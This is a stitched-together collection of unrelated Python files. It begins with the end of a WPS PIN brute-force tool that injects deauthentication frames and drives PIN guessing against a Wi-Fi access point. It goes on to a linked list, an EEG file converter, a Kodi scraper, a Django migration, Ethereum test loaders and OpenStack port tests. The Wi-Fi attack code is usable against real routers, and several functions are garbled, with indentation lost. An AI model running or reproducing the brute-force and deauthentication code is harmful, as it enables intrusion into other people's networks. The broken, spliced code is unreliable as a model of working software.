        deauth = RadioTap() / Dot11(proto=0L, FCfield=0L, subtype=12L, addr2=self.client_mac, addr3=self.bssid, addr1=self.bssid, SC=0, type=0L, ID=0) \
            / Dot11Deauth(reason=1)
        sendp(deauth, verbose=0)
    def disassemble_EAP_Expanded(self, p, has_FCS=False, has_start=False):
        """Parse a WSC EAP-Expanded payload into a list of [type, value].

        With has_start, the 9-byte header (vendor, vendor type, opcode,
        flags) is emitted first under the 0xFF0x pseudo-ids; has_FCS drops
        the trailing 4-byte frame checksum before parsing.
        """
        ret = []
        i = 0
        if has_FCS:
            e = str(p)[:-4] #remove FCS
        else:
            e = str(p)
        if has_start:
            ret.append([0xFF00, e[0:3]])
            ret.append([0xFF01, e[3:7]])
            ret.append([0xFF02, e[7:8]])
            ret.append([0xFF03, e[8:9]])
            i = 9
        # Walk the TLVs: 2-byte type, 2-byte big-endian length, then value.
        while i < len(e) - 4:
            data_length = unpack('!H', e[i + 2:i + 4])[0]
            ret.append([unpack('!H', e[i:i + 2])[0], e[(i + 4):(i + 4 + unpack('!H', e[i + 2:i + 4])[0])] ])
            i += data_length + 4
        return ret
def assemble_EAP_Expanded(self, l):
ret = ''
for i in range(len(l)):
if l[i][0] & 0xFF00 == 0xFF00:
ret += (l[i][1])
else:
ret += pack('!H', l[i][0]) + pack('!H', len(l[i][1])) + l[i][1]
return ret
    def dump_EAP_Expanded(self, lst):
        """Pretty-print a TLV list using the human-readable attribute names
        (unknown ids are shown raw)."""
        for e in lst:
            if e[0] in self.wps_attributes:
                print self.wps_attributes[e[0]], ':'
                hexdump(e[1])
            else:
                print 'Message ID 0x%X not found!' % e[0]
                print e
def main():
    """Parse the command line and start the WPS PIN brute force.

    All of --iface/--client/--bssid/--ssid are required; the rest have
    defaults (DH secret 1, 5 s timeout, start pin 00000000).
    """
    wps = WPSCrack()
    parser = optparse.OptionParser('usage: %prog --iface=IFACE --client=CLIENT_MAC --bssid=BSSID --ssid=SSID [optional arguments]')
    parser.add_option('-i', '--iface', dest='iface', default='', type='string', help='network interface (monitor mode)')
    parser.add_option('-c', '--client', dest='client_mac', default='', type='string', help='MAC of client interface')
    parser.add_option('-b', '--bssid', dest='bssid', default='', type='string', help='MAC of AP (BSSID)')
    parser.add_option('-s', '--ssid', dest='ssid', default='', type='string', help='SSID of AP (ESSID)')
    parser.add_option('--dh', dest='dh_secret', default=1, type='int', help='diffie-hellman secret number')
    parser.add_option('-t', '--timeout', dest='timeout', default=5, type='int', help='timemout in seconds')
    parser.add_option('-p', '--pin', dest='start_pin', default='00000000', type='string', help='start pin for brute force')
    parser.add_option('-v', '--verbose', action='store_true', dest='verbose', default=False, help='verbose')
    (options, _) = parser.parse_args()
    if options.iface != '' and options.client_mac != '' and options.bssid != '' and options.ssid != '':
        # conf.iface is scapy's global capture/send interface.
        conf.iface = options.iface
        wps.client_mac = options.client_mac
        wps.bssid = options.bssid
        wps.ssid = options.ssid
        wps.secret_number = options.dh_secret
        wps.timeout_time = options.timeout
        wps.verbose = options.verbose
        wps.pin = options.start_pin
        wps.run()
    else:
        print 'check arguments or use --help!'
        return
if __name__ == '__main__':
    main()
class Node:
    """Singly-linked list node: a payload plus a link to its successor.

    (The original `class` statement was corrupted by dataset residue
    `11295768 | `, which made the file unparseable.)
    """

    def __init__(self, data):
        self.data = data   # stored value
        self.next = None   # following Node, or None at the tail


class LinkedList:
    """Minimal singly-linked list with index-based access/insert/delete."""

    def __init__(self, value):
        # The list always starts with one node holding *value*.
        self.head = Node(value)

    def append(self, value):
        """Add *value* at the end of the list."""
        cur = self.head
        while cur.next is not None:
            cur = cur.next
        cur.next = Node(value)

    def print_all(self):
        """Print every element, one per line, head first."""
        cur = self.head
        while cur is not None:
            print(cur.data)
            cur = cur.next

    def get_node(self, index):
        """Return the node at position *index* (0-based)."""
        node = self.head
        count = 0
        while count < index:
            node = node.next
            count += 1
        return node

    def add_node(self, index, value):
        """Insert *value* so that it ends up at position *index*."""
        new_node = Node(value)
        if index == 0:
            new_node.next = self.head
            self.head = new_node
            return
        prev = self.get_node(index - 1)
        new_node.next = prev.next
        prev.next = new_node

    def delete_node(self, index):
        """Remove the node at position *index*.

        Fixes vs. the original: the index-0 case is handled before calling
        get_node(index - 1) (which only worked by accident with -1), and
        the stray leftover exercise-instruction string is no longer
        returned (returns None like other mutators).
        """
        if index == 0:
            self.head = self.head.next
            return
        prev = self.get_node(index - 1)
        prev.next = prev.next.next
# Quick manual demo: build [3, 5, 12, 6], print it, delete index 3 (the
# tail element 6), then print the remaining [3, 5, 12].
linked_list = LinkedList(5)
linked_list.append(12)
linked_list.append(6)
linked_list.add_node(0, 3)
linked_list.print_all()
print('-------delete---------')
linked_list.delete_node(3)
linked_list.print_all()
# ---- dataset file boundary ----
# File: minimum_example/to_h5.py
import json
import os
import sys
import h5py
import pyedflib
import tqdm
print("\n Converting EDF and annotations to standard H5 file")
# Usage: to_h5.py <download_directory> <h5_directory>
download_directory = sys.argv[1]
h5_directory = sys.argv[2]
if not os.path.isdir(h5_directory):
    os.makedirs(h5_directory)
# One record per *.edf file found in the download directory.
# NOTE(review): paths below are built by plain string concatenation, so
# download_directory presumably ends with a path separator -- confirm.
records = [
    x.split(".")[0] for x in os.listdir(download_directory) if x[-3:] == "edf"
]
for record in tqdm.tqdm(records):
    edf_filename = download_directory + record + ".edf"
    spindle_filename = download_directory + record + "_spindle.json"
    h5_filename = '{}/{}.h5'.format(h5_directory, record)
    with h5py.File(h5_filename, 'w') as h5:
        # Taking care of spindle annotations
        # Each JSON entry has "start"/"end"; stored as start + duration.
        spindles = [
            (x["start"], x["end"] - x["start"]) for x in json.load(open(spindle_filename))
        ]
        starts, durations = list(zip(*spindles))
        h5.create_group("spindle")
        h5.create_dataset("spindle/start", data=starts)
        h5.create_dataset("spindle/duration", data=durations)
        # Extract signals
        # One dataset per EDF channel, named by its lower-cased label, with
        # the sampling frequency stored as the "fs" attribute.
        with pyedflib.EdfReader(edf_filename) as f:
            labels = f.getSignalLabels()
            frequencies = f.getSampleFrequencies().astype(int).tolist()
            for i, (label, frequency) in enumerate(zip(labels, frequencies)):
                path = "{}".format(label.lower())
                data = f.readSignal(i)
                h5.create_dataset(path, data=data)
                h5[path].attrs["fs"] = frequency
# ---- dataset file boundary ----
# Source repository: C6SUMMER/allinclusive-kodi-pi
"""
SALTS XBMC Addon
Copyright (C) 2014 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import scraper
import re
import urlparse
import xbmcaddon
import xbmc
from salts_lib import log_utils
from salts_lib.trans_utils import i18n
from salts_lib.constants import VIDEO_TYPES
from salts_lib.constants import QUALITIES
from salts_lib.constants import USER_AGENT
BASE_URL = 'http://ororo.tv'
# Site category ids per video type (semantics defined by ororo.tv listings).
CATEGORIES = {VIDEO_TYPES.TVSHOW: '2,3', VIDEO_TYPES.MOVIE: '1,3,4'}
class OroroTV_Scraper(scraper.Scraper):
    # Default base URL; overridden per-user from the addon settings below.
    base_url = BASE_URL
    def __init__(self, timeout=scraper.DEFAULT_TIMEOUT):
        # Pull the user-configured URL and credentials from the addon settings.
        self.timeout = timeout
        self.base_url = xbmcaddon.Addon().getSetting('%s-base_url' % (self.get_name()))
        self.username = xbmcaddon.Addon().getSetting('%s-username' % (self.get_name()))
        self.password = xbmcaddon.Addon().getSetting('%s-password' % (self.get_name()))
    @classmethod
    def provides(cls):
        # Video types this scraper can resolve sources for.
        return frozenset([VIDEO_TYPES.TVSHOW, VIDEO_TYPES.SEASON, VIDEO_TYPES.EPISODE, VIDEO_TYPES.MOVIE])
    @classmethod
    def get_name(cls):
        # Display name; also used as the settings-id prefix.
        return 'ororo.tv'
    def resolve_link(self, link):
        # Streams are direct URLs already; nothing to resolve.
        return link
def format_source_label(self, item):
label = '[%s] %s (%s) (%s/100) ' % (item['quality'], item['host'], item['format'], item['rating'])
return label
    def get_sources(self, video):
        """Scrape the page for <source> tags and return direct-stream
        hoster dicts (HD720 for movies, HIGH otherwise)."""
        source_url = self.get_url(video)
        hosters = []
        if source_url:
            url = urlparse.urljoin(self.base_url, source_url)
            html = self._http_get(url, cache_limit=.5)
            if video.video_type == VIDEO_TYPES.MOVIE:
                quality = QUALITIES.HD720
                # Movies need a second hop: follow the data-href player page.
                match = re.search('data-href="([^"]+)', html)
                if match:
                    source_url = match.group(1)
                    url = urlparse.urljoin(self.base_url, source_url)
                    html = self._http_get(url, cache_limit=.5)
            else:
                quality = QUALITIES.HIGH
            for match in re.finditer("source src='([^']+)'\s+type='video/([^']+)", html):
                stream_url, format = match.groups()
                # Append the UA so downstream players send the same header.
                stream_url = stream_url + '|User-Agent=%s' % (USER_AGENT)
                hoster = {'multi-part': False, 'host': self._get_direct_hostname(stream_url), 'class': self, 'url': stream_url, 'quality': quality, 'views': None, 'rating': None, 'format': format, 'direct': True}
                hosters.append(hoster)
        return hosters
    def get_url(self, video):
        # Delegate to the framework's default show/movie URL lookup.
        return super(OroroTV_Scraper, self)._default_get_url(video)
    def _get_episode_url(self, show_url, video):
        """Locate the episode link by season/episode number, falling back
        to matching on episode title."""
        episode_pattern = 'data-href="([^"]+)[^>]*class="episode"\s+href="#%s-%s"' % (video.season, video.episode)
        title_pattern = 'data-href="([^"]+)[^>]+class="episode"[^>]+>.\d+\s+([^<]+)'
        return super(OroroTV_Scraper, self)._default_get_episode_url(show_url, video, episode_pattern, title_pattern)
    def search(self, video_type, title, year):
        """Scrape the listing page for titles matching *title* (and *year*
        when both sides provide one); premium-only movies are skipped
        unless the include_premium setting is enabled."""
        url = urlparse.urljoin(self.base_url, 'http://ororo.tv/en')
        if video_type == VIDEO_TYPES.MOVIE:
            url += '/movies'
        html = self._http_get(url, cache_limit=.25)
        results = []
        norm_title = self._normalize_title(title)
        include_paid = xbmcaddon.Addon().getSetting('%s-include_premium' % (self.get_name())) == 'true'
        for match in re.finditer('<span class=\'value\'>(\d{4})(.*?)href="([^"]+)[^>]+>([^<]+)', html, re.DOTALL):
            match_year, middle, url, match_title = match.groups()
            if not include_paid and video_type == VIDEO_TYPES.MOVIE and 'paid accounts' in middle:
                continue
            if norm_title in self._normalize_title(match_title) and (not year or not match_year or year == match_year):
                result = {'url': url, 'title': match_title, 'year': match_year}
                results.append(result)
        return results
    @classmethod
    def get_settings(cls):
        """Extend the base scraper settings XML with username/password and
        the include-premium toggle."""
        settings = super(OroroTV_Scraper, cls).get_settings()
        name = cls.get_name()
        settings.append('         <setting id="%s-username" type="text" label="     %s" default="" visible="eq(-6,true)"/>' % (name, i18n('username')))
        settings.append('         <setting id="%s-password" type="text" label="     %s" option="hidden" default="" visible="eq(-7,true)"/>' % (name, i18n('password')))
        settings.append('         <setting id="%s-include_premium" type="bool" label="     %s" default="false" visible="eq(-8,true)"/>' % (name, i18n('include_premium')))
        return settings
    def _http_get(self, url, data=None, cache_limit=8):
        """Cached HTTP fetch that transparently logs in when the response
        shows no active session (no sign-out link)."""
        # return all uncached blank pages if no user or pass
        if not self.username or not self.password:
            return ''
        html = super(OroroTV_Scraper, self)._cached_http_get(url, self.base_url, self.timeout, data=data, cache_limit=cache_limit)
        if not re.search('href="/en/users/sign_out"', html):
            log_utils.log('Logging in for url (%s)' % (url), xbmc.LOGDEBUG)
            self.__login()
            # Refetch uncached now that the session cookie is set.
            html = super(OroroTV_Scraper, self)._cached_http_get(url, self.base_url, self.timeout, data=data, cache_limit=0)
        return html
def __login(self):
url = urlparse.urljoin(self.base_url, '/en/users/sign_in')
data = {'user[email]': self.username, 'user[password]': <PASSWORD>, 'user[remember_me]': 1}
html = super(OroroTV_Scraper, self)._cached_http_get(url, self.base_url, self.timeout, data=data, allow_redirect=False, cache_limit=0)
if html != 'http://ororo.tv/en':
raise Exception('ororo.tv login failed: %s' % (html))
# ---- dataset file boundary ----
# Source: TheWITProject/MentorApp -- userProfile/migrations/0008_remove_profile_location.py
# Generated by Django 2.2.10 on 2020-04-13 23:53
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated migration: drops the Profile.location field
    # (presumably superseded by the 'location_q' field added in the
    # dependency migration 0007 -- confirm against the model history).
    dependencies = [
        ('userProfile', '0007_profile_location_q'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='profile',
            name='location',
        ),
    ]
# ---- dataset file boundary ----
import glob
import os
from eth_utils import to_tuple
from ruamel.yaml import YAML
from yaml_test_execution import execute_ssz_test_case, execute_tree_hash_test_case
# Root of the checked-out eth2.0-tests repo, relative to this file.
YAML_BASE_DIR = os.path.abspath(os.path.join(__file__, "../../eth2.0-tests/"))
# All SSZ / tree-hash YAML fixture files, discovered recursively.
SSZ_TEST_FILES = glob.glob(
    os.path.join(YAML_BASE_DIR, "ssz", "**/*.yaml"), recursive=True
)
TREE_HASH_TEST_FILES = glob.glob(
    os.path.join(YAML_BASE_DIR, "tree_hash", "**/*.yaml"), recursive=True
)
@to_tuple
def load_test_cases(filenames):
    """Yield (test_case, test_id) pairs from the given YAML files.

    Files are read in sorted order for deterministic test ordering;
    @to_tuple materialises the generator into a tuple for callers.
    """
    yaml = YAML()
    for filename in sorted(filenames):
        with open(filename) as f:
            test = yaml.load(f)
        for test_case in test["test_cases"]:
            yield test_case, make_test_id(filename, test_case)
def make_test_id(filename, test_case):
    """Build a readable pytest id: '<source file>:<line of the test case>'.

    Fix: the original returned a hard-coded "(unknown)" placeholder (an
    anonymisation artefact) and ignored *filename* entirely, making every
    id from the same line number collide across files.
    """
    return f"{filename}:{test_case.lc.line}"
def pytest_generate_tests(metafunc):
    """Pytest hook: parametrize the ssz / tree-hash fixtures from the YAML
    fixture files discovered at import time."""
    fixture_to_test_files = {
        "ssz_test_case": SSZ_TEST_FILES,
        "tree_hash_test_case": TREE_HASH_TEST_FILES,
    }
    for fixture_name, test_files in fixture_to_test_files.items():
        if fixture_name in metafunc.fixturenames:
            test_cases_with_ids = load_test_cases(test_files)
            # zip(*...) on an empty tuple would fail, hence the guard.
            if len(test_cases_with_ids) > 0:
                test_cases, test_ids = zip(*test_cases_with_ids)
            else:
                test_cases, test_ids = (), ()
            metafunc.parametrize(fixture_name, test_cases, ids=test_ids)
def test_ssz(ssz_test_case):
    """Run one parametrized SSZ serialisation test case."""
    execute_ssz_test_case(ssz_test_case)
def test_tree_hash(tree_hash_test_case):
    """Run one parametrized tree-hash test case."""
    execute_tree_hash_test_case(tree_hash_test_case)
# ---- dataset file boundary ----
# Source repository: cm107/common_utils
from functools import wraps
import sys
import traceback
def bypass_error_in_classmethod(print_func=print):
    """Decorator factory for instance methods: run the method and, instead
    of propagating an exception, report its traceback via *print_func*.

    Fixes vs. the original:
      * the wrapped method's return value is now propagated (it used to be
        silently discarded, so decorated methods always returned None);
      * only ``Exception`` is caught, so KeyboardInterrupt / SystemExit
        still propagate (the bare ``except:`` swallowed those too);
      * the unused ``etype, evalue`` unpacking was dropped.
    On error, the formatted traceback minus the wrapper's own frame is
    passed to *print_func* and None is returned.
    """
    def inner(method):
        @wraps(method)
        def wrapper(self, *args, **kwargs):
            try:
                return method(self, *args, **kwargs)
            except Exception:
                tb = sys.exc_info()[2]
                frames = traceback.format_tb(tb=tb)
                # frames[0] is this wrapper itself -- not useful to report.
                print_func(''.join(frames[1:]))
        return wrapper
    return inner
def bypass_error_in_func(print_func=print):
    """Decorator factory for plain functions: run the function and, instead
    of propagating an exception, report its traceback via *print_func*.

    Fixes vs. the original (mirroring bypass_error_in_classmethod):
      * the wrapped function's return value is now propagated;
      * only ``Exception`` is caught instead of a bare ``except:``;
      * the unused ``etype, evalue`` unpacking was dropped.
    On error, the formatted traceback minus the wrapper's own frame is
    passed to *print_func* and None is returned.
    """
    def inner(func):
        @wraps(func)
        def wrapper(*args, **kwargs):
            try:
                return func(*args, **kwargs)
            except Exception:
                tb = sys.exc_info()[2]
                frames = traceback.format_tb(tb=tb)
                # frames[0] is this wrapper itself -- not useful to report.
                print_func(''.join(frames[1:]))
        return wrapper
    return inner
# Source repository: nuagenetworks/nuage-tempest-plugin
# Copyright 2017 NOKIA
# All Rights Reserved.
from netaddr import IPNetwork
import testtools
from tempest.common import waiters
from tempest.lib import exceptions
from tempest.scenario import manager
from tempest.test import decorators
from nuage_tempest_plugin.lib.test.nuage_test import NuageAdminNetworksTest
from nuage_tempest_plugin.lib.test.nuage_test import NuageBaseTest
from nuage_tempest_plugin.lib.topology import Topology
from nuage_tempest_plugin.lib.utils import constants
from nuage_tempest_plugin.services.nuage_client import NuageRestClient
CONF = Topology.get_conf()  # tempest/plugin configuration object
LOG = Topology.get_logger(__name__)  # module-level logger
class PortsTest(NuageBaseTest, NuageAdminNetworksTest,
manager.NetworkScenarioTest):
    @classmethod
    def setup_clients(cls):
        """Set up REST clients; additionally attach a Nuage VSD client.

        The VSD client is used throughout this class to verify backend
        state (L2 domains, vports, virtual IPs) directly on the VSD.
        """
        super(PortsTest, cls).setup_clients()
        cls.vsd_client = NuageRestClient()
def show_port(self, port_id):
"""Wrapper utility that shows a given port."""
body = self.ports_client.show_port(port_id)
return body['port']
def _create_server(self, name, network, port_id=None):
keypair = self.create_keypair()
network = {'uuid': network['id']}
if port_id is not None:
network['port'] = port_id
return self.create_server(
name=name,
networks=[network],
key_name=keypair['name'],
wait_until='ACTIVE')
def _delete_server(self, server_id, clients=None):
if clients is None:
clients = self.os_primary
clients.servers_client.delete_server(server_id)
waiters.wait_for_server_termination(clients.servers_client, server_id)
@decorators.attr(type='smoke')
def test_nuage_dhcp_port_create_check_status(self):
network = self.create_network()
self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=24)
filters = {
'device_owner': 'network:dhcp:nuage',
'network_id': network['id']
}
dhcp_port = self.ports_client.list_ports(**filters)['ports'][0]
self.assertEqual('ACTIVE', dhcp_port['status'])
@decorators.attr(type='smoke')
def test_nuage_dhcp_port_with_router_detach_check_status(self):
network = self.create_network()
subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=24)
router = self.create_router(
admin_state_up=True,
external_network_id=CONF.network.public_network_id)
self.create_router_interface(router_id=router["id"],
subnet_id=subnet["id"],
cleanup=False)
self.routers_client.remove_router_interface(router_id=router["id"],
subnet_id=subnet["id"])
filters = {
'device_owner': 'network:dhcp:nuage',
'network_id': network['id']
}
dhcp_port = self.ports_client.list_ports(**filters)['ports'][0]
self.assertEqual('ACTIVE', dhcp_port['status'])
@decorators.attr(type='smoke')
def test_nuage_port_create_show_check_status(self):
network = self.create_network()
self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=24)
port = self.create_port(network)
self.assertEqual('DOWN', port['status'])
port = self.show_port(port['id'])
# state has to remain DOWN as long as port is not bound
self.assertEqual('DOWN', port['status'])
@decorators.attr(type='smoke')
def test_nuage_port_create_server_create_delete_check_status(self):
network = self.create_network()
self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=24)
port = self.create_port(network)
server = self._create_server('s1', network, port['id'])
port = self.show_port(port['id'])
self.assertEqual('ACTIVE', port['status'])
self._delete_server(server['id'])
port = self.show_port(port['id'])
self.assertEqual('DOWN', port['status'])
    @decorators.attr(type='smoke')
    def test_nuage_port_create_fixed_ips_negative(self):
        """Port create with IPv4 fixed IPs from two different subnets of the
        same network must be rejected with BadRequest."""
        # Set up resources
        # Base resources
        if self.is_dhcp_agent_present():
            raise self.skipException(
                'Cannot run this test case when DHCP agent is enabled')
        network = self.create_network()
        self.assertIsNotNone(network, "Unable to create network")
        subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
                                    mask_bits=28)
        self.assertIsNotNone(subnet, "Unable to create subnet")
        # NOTE(review): the literal IPs below look inconsistent with the
        # subnet CIDRs (presumably sanitized) -- verify against original data.
        subnet2 = self.create_subnet(network, cidr=IPNetwork("192.168.3.11/24"),
                                     mask_bits=28)
        self.assertIsNotNone(subnet2, "Unable to create second subnet")
        fixed_ips = [
            {
                "ip_address": "10.0.0.4",
                "subnet_id": subnet["id"]
            },
            {
                "ip_address": "172.16.31.10",
                "subnet_id": subnet2["id"]
            }
        ]
        # Fail
        msg = "Port can't have multiple IPv4 IPs of different subnets"
        self.assertRaisesRegex(exceptions.BadRequest,
                               msg,
                               self.create_port,
                               network=network, fixed_ips=fixed_ips)
    @testtools.skipIf(Topology.before_nuage('5.4'), 'Unsupported pre-5.4')
    def test_nuage_os_managed_subnet_port_create_with_nuage_policy_negative(
            self):
        """Port create with VSD policy groups on an OS-managed subnet must
        be rejected with BadRequest."""
        network = self.create_network()
        self.assertIsNotNone(network, "Unable to create network")
        subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
                                    mask_bits=28)
        self.assertIsNotNone(subnet, "Unable to create subnet")
        msg = ("Cannot use VSP policy groups on OS managed subnets,"
               " use neutron security groups instead.")
        self.assertRaisesRegex(exceptions.BadRequest,
                               msg,
                               self.create_port,
                               network=network,
                               nuage_policy_groups=['Random_value'])
    @testtools.skipIf(Topology.before_nuage('5.4'), 'Unsupported pre-5.4')
    def test_nuage_os_managed_subnet_port_update_with_nuage_policy_negative(
            self):
        """Port update with VSD policy groups on an OS-managed subnet must
        be rejected with BadRequest."""
        network = self.create_network()
        self.assertIsNotNone(network, "Unable to create network")
        subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
                                    mask_bits=28)
        self.assertIsNotNone(subnet, "Unable to create subnet")
        port = self.create_port(network=network)
        self.assertIsNotNone(port, "Unable to create port")
        msg = ("Cannot use VSP policy groups on OS managed subnets,"
               " use neutron security groups instead.")
        self.assertRaisesRegex(exceptions.BadRequest,
                               msg,
                               self.update_port,
                               port=port,
                               nuage_policy_groups=['Random_value'])
    @decorators.attr(type='smoke')
    def test_nuage_port_update_fixed_ips_negative(self):
        """Updating a port's fixed IP within its subnet succeeds; moving it
        to a different subnet of the same network must fail."""
        if self.is_dhcp_agent_present():
            raise self.skipException(
                'Multiple subnets in a network not supported when DHCP agent '
                'is enabled.')
        # Set up resources
        # Base resources
        network = self.create_network()
        self.assertIsNotNone(network, "Unable to create network")
        subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
                                    mask_bits=28)
        self.assertIsNotNone(subnet, "Unable to create subnet")
        subnet2 = self.create_subnet(network, cidr=IPNetwork("192.168.3.11/24"),
                                     mask_bits=28)
        self.assertIsNotNone(subnet2, "Unable to create second subnet")
        router = self.create_router(
            admin_state_up=True,
            external_network_id=CONF.network.public_network_id)
        self.assertIsNotNone(router, "Unable to create router")
        # Attach subnet
        self.create_router_interface(router_id=router["id"],
                                     subnet_id=subnet["id"])
        self.create_router_interface(router_id=router["id"],
                                     subnet_id=subnet2["id"])
        # Create port
        fixed_ips = [
            {
                "ip_address": "10.0.0.4",
                "subnet_id": subnet["id"]
            }
        ]
        port = self.create_port(network=network, fixed_ips=fixed_ips)
        self.assertIsNotNone(port, "Unable to create port on network")
        # update within subnet should succeed
        fixed_ips = [
            {
                "ip_address": "10.0.0.5",
                "subnet_id": subnet["id"]
            }
        ]
        port = self.update_port(port=port, fixed_ips=fixed_ips)
        self.assertIsNotNone(port, "Unable to update port")
        self.assertEqual(port["fixed_ips"][0]["ip_address"], "10.0.0.5",
                         message="The port did not update properly.")
        # Update to subnet2 should fail
        fixed_ips = [
            {
                "ip_address": "172.16.31.10",
                "subnet_id": subnet2["id"]
            }
        ]
        try:
            self.update_port(port=port, fixed_ips=fixed_ips)
            self.fail("Exception expected when updating to"
                      " a different subnet!")
        except exceptions.BadRequest as e:
            # NOTE(review): relies on the private _error_string attribute of
            # the tempest exception to distinguish failure causes.
            if "Updating fixed ip of port" in e._error_string:
                pass
            else:
                # Differentiate between VSD failure and update failure
                LOG.debug(e._error_string)
                self.fail("A different NuageBadRequest exception"
                          " was expected for this operation.")
    @decorators.attr(type='smoke')
    def test_nuage_port_create_fixed_ips_same_subnet_l2(self):
        """Create a port with two fixed IPs from one subnet (L2 domain):
        the VSD vport keeps INHERITED address spoofing."""
        # Set up resources
        # Base resources
        network = self.create_network()
        self.assertIsNotNone(network, "Unable to create network")
        subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
                                    mask_bits=28)
        self.assertIsNotNone(subnet, "Unable to create subnet")
        fixed_ips = [
            {
                "ip_address": "10.0.0.4",
                "subnet_id": subnet["id"]
            },
            {
                "ip_address": "10.0.0.5",
                "subnet_id": subnet["id"]
            }
        ]
        port = self.create_port(network=network, fixed_ips=fixed_ips)
        self.assertIsNotNone(port, "Unable to create port on network")
        # Locate the backing L2 domain and the port's vport on the VSD.
        vsd_vport_parent = self.vsd_client.get_global_resource(
            constants.L2_DOMAIN,
            filters='externalID',
            filter_value=subnet['id'])[0]
        nuage_vport = self.vsd_client.get_vport(
            constants.L2_DOMAIN,
            vsd_vport_parent['ID'],
            filters='externalID',
            filter_value=port['id'])
        self.assertEqual(constants.INHERITED,
                         nuage_vport[0]['addressSpoofing'])
    @decorators.attr(type='smoke')
    def test_nuage_port_update_fixed_ips_same_subnet_l2(self):
        """Update a port to two fixed IPs within the same subnet (L2 domain):
        address spoofing stays INHERITED before and after."""
        # Set up resources
        # Base resources
        network = self.create_network()
        self.assertIsNotNone(network, "Unable to create network")
        subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
                                    mask_bits=28)
        self.assertIsNotNone(subnet, "Unable to create subnet")
        fixed_ips = [
            {
                "ip_address": "10.0.0.4",
                "subnet_id": subnet["id"]
            }
        ]
        port = self.create_port(network=network, fixed_ips=fixed_ips)
        self.assertIsNotNone(port, "Unable to create port on network")
        vsd_vport_parent = self.vsd_client.get_global_resource(
            constants.L2_DOMAIN,
            filters='externalID',
            filter_value=subnet['id'])[0]
        nuage_vport = self.vsd_client.get_vport(
            constants.L2_DOMAIN,
            vsd_vport_parent['ID'],
            filters='externalID',
            filter_value=port['id'])
        self.assertEqual(constants.INHERITED,
                         nuage_vport[0]['addressSpoofing'])
        # update within subnet should succeed
        fixed_ips = [
            {
                "ip_address": "10.0.0.4",
                "subnet_id": subnet["id"]
            },
            {
                "ip_address": "10.0.0.5",
                "subnet_id": subnet["id"]
            }
        ]
        port = self.update_port(port=port, fixed_ips=fixed_ips)
        self.assertIsNotNone(port, "Unable to update port")
        nuage_vport = self.vsd_client.get_vport(
            constants.L2_DOMAIN,
            vsd_vport_parent['ID'],
            filters='externalID',
            filter_value=port['id'])
        self.assertEqual(constants.INHERITED,
                         nuage_vport[0]['addressSpoofing'])
    @decorators.attr(type='smoke')
    def test_nuage_port_create_fixed_ips_same_subnet_l3(self):
        """Create a port with two fixed IPs in an L3 (routed) subnet:
        spoofing stays INHERITED and the extra IP becomes a VSD virtual IP
        carrying the port's MAC."""
        # Set up resources
        # Base resources
        network = self.create_network()
        self.assertIsNotNone(network, "Unable to create network")
        subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
                                    mask_bits=28)
        self.assertIsNotNone(subnet, "Unable to create subnet")
        router = self.create_router(
            admin_state_up=True,
            external_network_id=CONF.network.public_network_id)
        self.assertIsNotNone(router, "Unable to create router")
        # Attach subnet
        self.create_router_interface(router_id=router["id"],
                                     subnet_id=subnet["id"])
        fixed_ips = [
            {
                "ip_address": "10.0.0.4",
                "subnet_id": subnet["id"]
            },
            {
                "ip_address": "10.0.0.5",
                "subnet_id": subnet["id"]
            }
        ]
        port = self.create_port(network=network, fixed_ips=fixed_ips)
        self.assertIsNotNone(port, "Unable to create port on network")
        vsd_vport_parent = self.vsd_client.get_global_resource(
            constants.SUBNETWORK,
            filters='externalID',
            filter_value=subnet['id'])[0]
        nuage_vport = self.vsd_client.get_vport(
            constants.SUBNETWORK,
            vsd_vport_parent['ID'],
            filters='externalID',
            filter_value=port['id'])
        self.assertEqual(constants.INHERITED,
                         nuage_vport[0]['addressSpoofing'])
        # Verify the VSD virtual IPs: only the first fixed IP is expected.
        nuage_vport_vips = self.vsd_client.get_virtual_ip(
            constants.VPORT,
            nuage_vport[0]['ID'])
        valid_vips = ['10.0.0.4']
        vip_mismatch = False
        mac_mismatch = False
        if valid_vips and not nuage_vport_vips:
            vip_mismatch = True
        for nuage_vport_vip in nuage_vport_vips:
            if nuage_vport_vip['virtualIP'] not in valid_vips:
                vip_mismatch = True
            if nuage_vport_vip['MAC'] != port['mac_address']:
                mac_mismatch = True
        self.assertEqual(vip_mismatch, False)
        self.assertEqual(mac_mismatch, False)
    @decorators.attr(type='smoke')
    def test_nuage_port_create_fixed_ips_same_subnet_l3_no_security(self):
        """Create a port with two fixed IPs and port security disabled:
        spoofing must be ENABLED on the VSD vport, VIPs still created."""
        # Set up resources
        # Base resources
        network = self.create_network()
        self.assertIsNotNone(network, "Unable to create network")
        subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
                                    mask_bits=28)
        self.assertIsNotNone(subnet, "Unable to create subnet")
        router = self.create_router(
            admin_state_up=True,
            external_network_id=CONF.network.public_network_id)
        self.assertIsNotNone(router, "Unable to create router")
        # Attach subnet
        self.create_router_interface(router_id=router["id"],
                                     subnet_id=subnet["id"])
        fixed_ips = [
            {
                "ip_address": "10.0.0.4",
                "subnet_id": subnet["id"]
            },
            {
                "ip_address": "10.0.0.5",
                "subnet_id": subnet["id"]
            }
        ]
        port = self.create_port(network=network, fixed_ips=fixed_ips,
                                port_security_enabled=False)
        self.assertIsNotNone(port, "Unable to create port on network")
